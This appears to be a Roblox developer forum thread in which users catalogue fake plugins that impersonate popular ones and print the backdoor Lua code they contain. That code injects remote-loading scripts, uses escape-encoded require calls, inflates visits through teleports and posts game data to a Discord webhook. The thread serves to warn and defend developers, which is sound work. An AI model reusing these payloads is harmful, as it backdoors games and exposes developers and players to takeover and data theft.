Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)
Roundify
Original: 2233768483
Malicious: 3745147634
Intro Creator
Original: 723917710
Malicious: 3664187642
Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)
Roundify
Original: 2233768483
Malicious: 3745147634
Intro Creator
Original: 723917710
Malicious: 3664187642
Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332
Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463
This is awesome. Much faster than self-verification and an easy way of getting what you need.
Thanks for creating the tool!
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:
pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:
a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED
~~
~~
Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
–Official roblox studio script
require(4582121027):protecc()
]]
Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic
~~
~~
Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService(“TeleportService”)
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)
local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)
]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.
~~
~~
Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:
a(b)function c(d)d.Source=d.Source…’\n’…game:GetObjects(‘rbxassetid://4850318089’)[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,‘Script’)and not string.find(d.Source,‘4794986906’)then c(d)d:GetPropertyChangedSignal(‘Source’):Connect(function()if not string.find(d.Source,‘4794986906’)then c(d)end end)end end;f=false;function g()d=game:GetObjects(‘rbxassetid://4852273118’)[1]if not b:FindFirstChild(‘Filter Event’)or b:FindFirstChild(‘Filter Event’).Source~=d.Source then d.Parent=b else d=b:FindFirstChild(‘Filter Event’)end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal(‘Parent’):Connect(h)d.Changed:Connect(function(j)if rawequal(j,‘Disabled’)or rawequal(j,‘Source’)then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService(‘ServerScriptService’))
There are multiple require-id’s in this action attempt. All require ids listed.
Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:
–[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
– You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService(“RunService”)
local Require = require
local Loader = 4794986906 – Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then – Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) – Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end
Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as orbfuscated.
Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:
if not game:service’RunService’:IsStudio() then getfenv()"\114\101\113\117\105\114\101" end
Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id
~~
~~
Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:
pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source=’–[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is apart of above malicious plugins
Backdoor malicious module
getfenv()['\114\101\113\117\105\114\101'](2422875198*2)
2422875198*2 = 4845750396
is orbfuscated but by running in repl.it, prints module id that failed to load.
which it then loads
which has a script to then load
Roblox = "IsStudio"
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end
and
--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {}
local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
CheckMeIn = "Loaded."
local a = script.Script
a.Parent = workspace.Camera
end
return module
Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.
The top script then finally loads this module.
This module has a lot of obfuscated code, but one of the scripts remained un obfuscated, loading these two other modules.
MainModule> Folder> Main> ul
-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(6157358) >= 2 then
wait(0.1)
require(4674979018):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
end
end)
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(5860863) >= 2 then
wait(0.1)
require(4834950415):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
end
end)
game:GetService("Players").PlayerAdded:Connect(
function(player)
if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
game:GetService("TeleportService"):Teleport(5009641755, player)
end
end
)
Many of the modules uses these groups to check if player is a member of before giving members scripts in this backdoor.
Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’
One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.
Loads another module
and another module
This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle
another module
This backdoor is still loaded by an unknown plugin, still looking for it.
Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.
Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:
if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end
This has to be a “virus”, delete those.
Another way to detect those is by Searching “game:service”, INCASE you haven’t used “game:service” in your script.
I do not know what malicious plugin my friend has installed
Already covered this one and Roblox has finally deleted this module.
https://www.roblox.com/library/4723753937/Content-Deleted
https://www.roblox.com/library/4929048497/Test
Two modules required by malicious code. I don’t know which pluigin though, sorry. Hope this helps.
The second module teleports here:
https://www.roblox.com/games/4915459682/Loading?refPageId=ad45ba48-2b45-4b42-ad1e-93d4fdc2113f
That module requires this
Looks like I completely missed you notifying me about this… but the script is definitely not mine. The only way to install CheckMeIn is through these models: Standard Kit, Enterprise Kit. I am aware of many other models on the platform that claim to be the official kit, but they are instead a combination of the official kit, with a back door added. That’s what you’ve found here. All I can do about this is tell my users not to install any third party modules, since technically a back door is not against the Roblox rules.
Edit: The require id it has does load a model that is on your account if that is what you ment. This script however, considered it to just be loading your module.
That’s what I exactly replied to people in your discord server but your discord server ended up being toxic against my attempt to inform your group directly and I left. I just wanted to let you guys know and attempt to invalidate whatever key the backdoor was using. It doesn’t matter if a backdoor isn’t against the tos, it’s malicious and Roblox can moderate any accounts for any reason.
Edit: I’m not saying that your module is one, I’m saying that it’s being used inside one. Any further chats about this, please message.
Maybe move this to a github repo, it makes it much easier to log and request the data as you can just send a HTTP GET request to the repository to download a JSON file, plus it allows for other developers to use the same list if they were to make their own anti-virus
I have no idea how your system works so I cannot provide an example, but you can just do
HTTPService:GetAsync(a link to your repository) and then decode it in JSONDecode
Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicios action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Both of the malicious action leads to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, it’s constant dump can be found here - https://pastebin.com/raw/FhZyxTty.
F3X Plugin
Malicious:
Original:
Fake Anti-Virus/Backdoor Scanner
Malicious:
Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3
Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin
Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)
Malicious Script, plugin unknown
require(4751241292)()
Malicious Action
local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
if f == true then
return true
else
return false
end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
local A = CheckHttp()
if A == true then
local Data = {
content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end
local A = CheckHttp()
if A == true then
local Data = {
content = "omg a game! https://www.roblox.com/games/"..game.PlaceId;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end
Essentially gives a serverside loadstring gui if a player is or is friends with…
https://www.roblox.com/users/1460281907/profile
Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.
Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.
after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.